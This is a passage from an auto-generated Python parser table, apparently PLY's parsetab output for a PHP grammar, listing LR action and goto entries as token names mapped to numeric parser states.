9,560,562,563,564,565,567,568,595,596,597,598,600,602,604,605,606,607,615,618,619,623,625,626,628,635,642,643,647,649,673,675,676,678,680,681,683,684,685,686,695,696,697,698,699,700,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,731,732,733,734,736,737,738,743,748,749,750,752,753,769,770,772,789,791,792,793,794,795,798,801,802,803,804,805,806,807,808,809,810,817,818,821,823,824,834,838,840,854,855,856,858,859,872,885,887,888,900,902,903,904,905,916,919,922,927,936,943,944,947,956,957,],[-362,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,272,273,-190,-429,-430,-443,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,-443,-443,-254,-443,-259,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,416,-347,-348,-363,-443,-227,-228,-349,-364,-428,445,-267,-268,-269,477,-443,-443,-244,-248,-250,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,487,-72,-73,-75,492,498,-106,-107,501,-443,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-443,-197,-188,534,-201,-202,-203,536,-253,-255,-265,-264,-258,544,-335,546,547,-345,548,-443,-352,-443,-365,-385,-229,-366,-230,-357,-358,562,-219,-443,-209,-270,569,-429,-402,-378,-379,-382,-383,-384,-389,-430,-184,-443,-221,-243,-245,-238,-320,-443,644,-170,-171,-172,-353,-182,-234,673,-229,-189,-443,-230,-443,-443,-252,-257,-263,-333,-336,-337,-346,-443,695,-443,-443,-443,-443,-218,-235,-236,-240,702,-266,-392,-393,728,-380,-390,-443,-396,-443,-399,-402,743,-249,-319,747,-74,-443,-79,-105,-58,765,-173,-174,-196,-191,-194,793,-200,-256,-262,-334,-205,-223,-210,801,802,-231,804,805,-232,-211,-403,-404,-405,-406,-407,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,807,-395,-397,-265,-365,-366,-386,-220,-443,822,-81,-443,-80,-169,-176,-175,-231,-193,-232,-204,-199,-261,-222,-212,-213,-443,-214,-215,-443,-394,-398,-402,-401,-246,-247,868,-82,872,-59,-177,-178,-195,-260,-443,902,903,-78,920,-277,-179,-224,-216,-217,-400,934,941,-271,-276,-443,952,-275,-443,958,-274,965,]),'COMMA':([12,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,116,117,119,122,123,125,126,127,170,171,172,174,175,176,177,178,187,203,204,206,207,208,209,212,213,214,216,217,221,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,265,269,271,273,278,279,280,281,282,283,298,300,301,302,303,305,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,341,342,350,357,358,359,362,365,374,376,377,378,379,380,381,382,383,384,385,386,388,389,390,392,397,398,399,400,402,406,412,413,416,418,419,425,426,427,428,430,431,433,434,436,437,444,445,447,451,452,453,454,458,459,461,462,463,464,467,474,475,478,479,480,481,482,484,486,493,495,496,497,504,505,506,507,508,511,516,520,521,524,525,526,527,529,530,531,533,535,536,538,539,544,546,547,548,549,555,556,557,559,560,562,563,564,565,567,568,595,596,598,600,605,606,607,612,615,618,619,625,633,635,642,643,647,649,651,652,673,675,676,678,680,681,683,684,685,686,695,696,697,698,699,700,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,752,769,770,772,775,780,783,785,786,789,791,792,793,794,795,798,801,802,803,804,805,806,807,808,809,810,817,818,824,834,838,840,843,854,855,856,858,859,885,887,888,896,897,900,902,903,904,919,922,926,927,943,944,945,947,948,956,957,],[-362,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,-429,-430,-443,293,-20,296,-14,-15,349,-95,-96,353,-100,-102,356,-104,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,-443,404,-259,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-443,-227,-228,-349,-364,-428,446,-267,-268,-269,-16,-443,-443,-244,-248,-250,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,490,-75,-97,499,-106,-107,502,-443,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-443,-197,-188,535,-201,-202,-203,-253,-258,545,-335,-345,-443,-352,-443,-365,-385,-229,-366,-230,-357,-358,446,-219,-443,-209,-270,-19,-429,-21,-402,-378,-379,-382,-383,-384,-389,-430,-13,-17,-184,-443,-221,-243,-245,-238,-320,-94,-99,-101,-103,-443,645,-170,-171,-172,-353,-117,656,-149,-182,-234,446,-229,-189,-443,-230,-443,-443,-252,-257,-263,-333,-336,-337,-346,-443,446,-443,-443,-443,-443,-218,-235,-236,-240,446,-266,-392,-393,-380,-390,734,-399,-402,-18,446,-249,-319,-74,-98,-105,-58,645,-173,-174,656,-118,-196,-191,-194,535,-200,-256,-262,-334,-205,-223,-210,446,446,-231,446,446,-232,-211,-403,-404,-405,-406,-407,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,-443,-169,-176,-175,-119,845,-148,850,-145,-231,-193,-232,-204,-199,-261,-222,-212,-213,-443,-214,-215,-443,-394,-398,-402,-401,-246,-247,535,-59,-177,-178,850,-195,-260,-443,446,446,921,-277,-179,-144,-143,-224,-216,-217,-400,-271,-276,-147,-443,-275,-443,-146,645,-142,-274,645,]),'DOUBLE_ARROW':([12,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,116,117,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,300,301,302,303,305,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,416,418,419,426,427,428,430,431,433,434,437,445,452,458,459,461,462,463,464,467,478,480,481,482,484,486,511,524,525,527,529,530,531,536,538,544,546,547,548,549,562,563,564,565,595,596,598,600,607,618,619,626,628,673,675,676,685,686,695,698,701,702,729,730,732,736,737,738,743,753,789,791,792,794,798,801,802,804,805,807,809,817,818,854,856,872,900,902,903,919,],[-362,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,-429,-430,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,407,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-227,-228,-349,-364,-428,-443,-443,-244,-248,-250,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,-345,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,-209,-429,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,-238,-320,-353,-182,-234,-229,-189,-443,-230,-252,682,-333,-336,-337,-346,-443,-218,-235,-236,-240,-392,-393,-380,-390,735,-249,-319,751,-79,-196,-191,-194,-205,-223,-210,-231,-232,-211,-381,-391,-395,-365,-366,-386,-220,-80,-231,-193,-232,-199,-222,-212,-213,-214,-215,-394,860,-246,-247,-195,-443,-78,-224,-216,-217,-271,]),'RBRACKET':([12,35,39,43,44,45,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,116,117,187,203,204,205,206,207,208,209,212,213,214,216,219,220,221,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,267,269,271,273,278,279,300,301,302,303,305,306,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,374,376,377,378,379,380,381,382,383,384,385,386,387,388,390,392,402,403,404,405,406,416,418,419,426,427,428,430,431,433,434,437,438,445,452,454,458,459,461,462,463,464,467,468,478,480,481,482,484,486,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,562,563,564,565,595,596,598,600,603,604,605,606,607,616,618,619,673,675,676,681,683,685,686,687,688,689,690,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,733,734,736,737,738,743,744,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,855,856,900,902,903,904,919,],[-362,-429,-180,-251,-430,-443,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,-429,-430,-370,-323,-324,-443,-443,-185,-186,-187,-192,-225,-228,-198,402,-254,-443,-259,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-443,-227,-228,-349,-364,-428,-443,-443,-244,-248,-250,-241,-242,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,525,-183,-197,-188,-253,-255,-265,-264,-258,-345,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,563,-209,-429,-402,-378,-379,-382,-383,-384,-389,-430,-443,-184,-221,-243,-245,-238,-320,-353,-182,-234,-229,-189,-443,-230,-252,-257,-263,-333,-336,-337,-346,-443,-218,-235,-236,-240,-392,-393,-380,-390,732,-396,-443,-399,-402,-443,-249,-319,-196,-191,-194,-256,-262,-205,-223,-442,799,-440,-441,-210,-231,-232,-211,-403,-404,-405,-406,-407,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-397,-265,-365,-366,-386,-220,817,-231,-193,-232,-199,-261,-222,857,-212,-213,-214,-215,-394,-398,-402,-401,-246,-247,-195,-260,-443,-224,-216,-217,-400,-271,]),'COLON':([12,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,116,117,158,187,203,204,206,207,208,209,212,213,214,216,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,300,301,302,303,305,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,416,418,419,426,427,428,430,431,433,434,437,445,477,478,480,481,482,484,486,487,492,501,511,524,525,527,529,530,531,536,544,546,547,548,549,562,563,564,565,618,619,673,675,676,685,686,695,698,701,702,743,789,791,792,794,798,801,802,804,805,817,818,822,827,854,856,866,868,873,900,902,903,919,952,],[-362,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,-429,-430,336,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-227,-228,-349,-364,-428,-443,-443,-244,-248,-250,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,485,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,-345,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,-209,614,-184,-221,-243,-245,-238,-320,622,632,640,-353,-182,-234,-229,-189,-443,-230,-252,-333,-336,-337,-346,-443,-218,-235,-236,-240,-249,-319,-196,-191,-194,-205,-223,-210,-231,-232,-211,-220,-231,-193,-232,-199,-222,-212,-213,-214,-215,-246,-247,871,875,-195,-443,908,911,875,-224,-216,-217,-271,962,]),'AS':([12,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,116,117,127,187,203,204,206,207,208,209,212,213,214,216,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,298,300,301,302,303,305,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,343,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,416,418,419,426,427,428,430,431,433,434,437,445,478,480,481,482,484,486,511,524,525,527,529,530,531,536,544,546,547,548,549,562,563,564,565,618,619,673,675,676,685,686,695,698,701,702,743,789,791,792,794,798,801,802,804,805,817,818,854,856,900,902,903,919,932,933,959,],[-362,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,-429,-430,297,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-227,-228,-349,-364,-428,476,-443,-443,-244,-248,-250,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,491,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,-345,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,-209,-184,-221,-243,-245,-238,-320,-353,-182,-234,-229,-189,-443,-230,-252,-333,-336,-337,-346,-443,-218,-235,-236,-240,-249,-319,-196,-191,-194,-205,-223,-210,-231,-232,-211,-220,-231,-193,-232,-199,-222,-212,-213,-214,-215,-246,-247,-195,-443,-224,-216,-217,-271,950,-125,-124,]),'DOUBLE_COLON':([12,27,35,44,86,87,104,106,107,111,116,117,207,209,214,215,229,232,233,234,259,278,279,334,392,408,452,464,467,469,470,472,516,529,541,563,564,565,600,652,730,775,929,933,],[-187,-190,-429,-430,260,261,-233,-237,-239,-190,-429,-430,391,-187,-233,395,-187,410,411,-233,-188,-189,-428,-190,-188,-188,-429,-187,-430,608,609,-233,-117,-189,-189,-235,-236,-240,-188,-118,-189,-119,949,-429,]),'EQUALS':([39,73,84,85,100,101,104,106,107,124,176,269,271,301,302,303,305,363,418,428,431,437,445,480,481,482,508,525,534,549,562,563,564,565,618,641,647,649,685,686,695,698,701,702,743,772,786,798,801,802,804,805,817,818,847,856,891,896,900,902,903,],[191,-206,-207,-208,-225,-226,-228,-237,-239,294,354,-227,-228,-443,-244,-248,-250,503,-443,-229,-230,-219,-209,-221,-243,-245,646,-234,679,-443,-218,-235,-236,-240,-249,764,771,773,-205,-223,-210,-231,-232,-211,-220,839,851,-222,-212,-213,-214,-215,-246,-247,894,-443,924,928,-224,-216,-217,]),'PLUS_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[192,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'MINUS_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[193,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'MUL_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[194,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'DIV_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[195,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'CONCAT_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[196,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'MOD_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[197,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'AND_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[198,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'OR_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[199,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'XOR_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[200,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'SL_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[201,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'SR_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[202,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'ENCAPSED_AND_WHITESPACE':([76,98,99,103,186,257,258,262,263,264,266,366,420,421,422,435,460,471,610,611,691,692,694,739,799,901,],[-443,-443,-443,-443,-443,421,-432,421,435,-360,421,421,-431,-433,-434,-359,599,-443,739,-388,-436,-437,-439,-387,-435,-438,]),'DOLLAR_OPEN_CURLY_BRACES':([76,98,103,186,257,258,262,266,366,420,421,422,691,692,694,799,901,],[-443,-443,-443,-443,423,-432,423,423,423,-431,-433,-434,-436,-437,-439,-435,-438,]),'CURLY_OPEN':([76,98,103,186,257,258,262,266,366,420,421,422,691,692,694,799,901,],[-443,-443,-443,-443,424,-432,424,424,424,-431,-433,-434,-436,-437,-439,-435,-438,]),'END_HEREDOC':([98,258,262,420,421,422,471,610,611,691,692,694,739,799,901,],[-443,-432,433,-431,-433,-434,-443,738,-388,-436,-437,-439,-387,-435,-438,]),'END_NOWDOC':([99,263,264,435,],[-443,434,-360,-359,]),'IMPLEMENTS':([116,117,188,279,367,368,515,516,652,775,],[-429,-430,-443,-428,513,-115,-116,-117,-118,-119,]),'EXTENDS':([188,189,],[369,371,]),'VAR':([373,519,522,523,650,654,655,658,774,777,844,849,853,890,893,930,946,966,968,974,977,],[-443,-443,664,-130,-443,664,-136,-129,664,-135,-139,-132,-134,-138,-141,-133,-140,-131,-157,-137,-156,]),'PUBLIC':([373,519,522,523,650,654,655,658,662,665,666,667,668,669,670,671,672,774,777,788,844,849,853,890,893,930,946,950,966,968,974,977,],[-443,-443,670,-130,-443,670,-136,-129,670,-159,-163,-164,-165,-166,-160,-161,-162,670,-135,-158,-139,-132,-134,-138,-141,-133,-140,670,-131,-157,-137,-156,]),'PROTECTED':([373,519,522,523,650,654,655,658,662,665,666,667,668,669,670,671,672,774,777,788,844,849,853,890,893,930,946,950,966,968,974,977,],[-443,-443,671,-130,-443,671,-136,-129,671,-159,-163,-164,-165,-166,-160,-161,-162,671,-135,-158,-139,-132,-134,-138,-141,-133,-140,671,-131,-157,-137,-156,]),'PRIVATE':([373,519,522,523,650,654,655,658,662,665,666,667,668,669,670,671,672,774,777,788,844,849,853,890,893,930,946,950,966,968,974,977,],[-443,-443,672,-130,-443,672,-136,-129,672,-159,-163,-164,-165,-166,-160,-161,-162,672,-135,-158,-139,-132,-134,-138,-141,-133,-140,672,-131,-157,-137,-156,]),'CATCH':([500,636,637,973,],[-443,760,-53,-52,]),'FINALLY':([500,636,637,973,],[-443,761,-53,-52,]),'NUM_STRING':([550,],[690,]),}
_lr_action = {}
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = {}
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'start':([0,],[1,]),'top_statement_list':([0,114,276,],[2,277,442,]),'empty':([0,13,34,45,76,98,99,103,110,114,119,132,161,180,186,188,189,205,206,217,218,221,265,267,276,300,301,365,367,373,389,418,425,444,468,471,479,489,500,504,519,522,530,533,535,549,556,557,559,560,602,605,613,614,616,622,626,631,632,636,640,644,650,654,740,742,748,752,755,758,774,784,803,806,815,832,835,836,842,852,856,871,874,892,908,911,913,927,944,955,962,967,],[3,121,185,220,258,258,264,258,185,3,282,308,340,121,258,368,372,308,390,400,220,405,282,308,3,480,482,507,514,523,282,480,282,282,604,611,282,340,637,507,655,663,676,400,400,686,282,282,282,282,604,405,741,121,308,121,750,756,756,762,121,768,655,663,813,816,340,400,756,756,663,185,282,282,865,121,121,121,185,899,480,121,121,899,121,121,121,507,507,121,121,121,]),'top_statement':([2,277,442,],[4,4,4,]),'statement':([2,19,120,277,360,442,477,487,501,742,746,763,814,822,868,881,883,884,912,914,934,937,938,940,964,972,975,],[5,160,287,5,287,5,613,621,639,287,287,287,862,870,910,287,287,287,287,287,951,287,287,287,287,287,287,]),'function_declaration_statement':([2,120,277,360,442,742,746,763,881,883,884,912,914,937,938,940,964,972,975,],[6,288,6,288,6,288,288,288,288,288,288,288,288,288,288,288,288,288,288,]),'class_declaration_statement':([2,120,277,360,442,742,746,763,881,883,884,912,914,937,938,940,964,972,975,],[7,289,7,289,7,289,289,289,289,289,289,289,289,289,289,289,289,289,289,]),'namespace_name':([2,9,11,15,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,81,115,119,120,128,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,210,217,218,222,230,244,245,246,251,265,267,268,270,277,284,291,294,296,304,336,351,354,356,360,365,369,371,375,389,393,404,407,409,423,424,425,429,432,442,444,446,455,456,457,465,468,477,479,485,487,488,489,490,491,499,501,503,504,513,517,528,532,533,535,537,540,545,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,601,602,616,617,629,645,646,653,656,661,679,682,693,734,735,742,746,748,751,752,763,764,771,773,781,796,803,806,814,822,826,831,839,851,860,861,868,881,883,884,894,898,907,912,914,924,925,927,928,934,937,938,940,944,964,972,975,],[12,12,113,127,12,12,12,12,12,12,209,12,12,12,12,12,12,229,229,12,12,12,12,12,12,12,12,12,12,12,12,12,12,259,278,12,12,298,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,12,229,229,12,12,12,12,12,12,12,12,12,12,12,12,12,392,229,12,229,408,229,12,12,12,12,12,12,12,12,229,12,464,127,12,12,12,464,12,12,209,516,516,12,12,529,12,12,541,12,229,12,12,12,12,12,12,464,464,464,600,464,12,12,12,12,12,12,12,229,229,12,464,209,516,652,12,12,229,229,229,229,229,12,12,12,12,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,464,730,464,12,12,229,209,464,775,516,516,12,12,12,464,464,12,12,12,229,229,12,464,464,464,516,229,12,12,12,12,12,516,464,464,464,12,12,12,12,12,464,516,12,12,12,464,516,209,464,12,12,12,12,209,12,12,12,]),'expr':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,191,192,193,194,195,196,197,198,199,200,201,202,205,218,245,246,251,265,267,268,270,277,291,304,336,351,356,360,375,389,404,407,423,425,429,432,442,444,446,477,479,485,487,488,489,490,501,528,532,556,557,559,560,616,617,679,682,693,742,746,748,763,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[17,109,17,165,167,169,178,181,216,223,224,225,226,227,236,237,238,239,240,241,242,243,247,248,249,250,252,253,283,17,299,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,306,223,414,415,417,283,306,439,440,17,450,483,486,494,497,17,524,283,538,539,552,283,558,561,17,283,283,17,283,619,17,623,342,625,17,674,677,283,283,283,283,306,745,794,795,800,17,17,342,17,283,283,17,17,873,905,17,17,17,17,936,17,17,17,17,17,17,17,17,17,]),'class_entry_type':([2,120,277,360,442,742,746,763,881,883,884,912,914,937,938,940,964,972,975,],[36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,36,]),'variable':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,277,284,291,304,336,351,356,360,375,389,404,407,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,796,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[39,39,39,39,39,39,39,39,39,39,39,39,39,39,228,235,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,39,